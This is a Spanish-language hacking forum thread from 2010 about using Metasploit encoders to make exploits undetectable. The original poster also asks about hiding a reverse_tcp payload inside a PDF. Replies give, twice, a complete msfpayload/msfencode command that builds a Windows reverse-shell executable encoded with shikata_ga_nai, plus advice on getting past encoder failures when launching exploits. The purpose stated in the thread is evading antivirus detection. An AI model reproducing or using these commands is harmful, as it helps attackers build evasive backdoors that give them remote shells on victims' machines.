Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: illera88 en 18 Febrero 2010, 12:06 pm



Título: Encoders de Metasploit
Publicado por: illera88 en 18 Febrero 2010, 12:06 pm
Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo


Título: Re: Encoders de Metasploit
Publicado por: Shell Root en 18 Febrero 2010, 17:31 pm
mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
Código:
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.



Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD


Título: Re: Encoders de Metasploit
Publicado por: alexkof158 en 23 Febrero 2010, 17:34 pm
vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 


Título: Re: Encoders de Metasploit
Publicado por: Shell Root en 23 Febrero 2010, 19:00 pm
Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
Código:
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe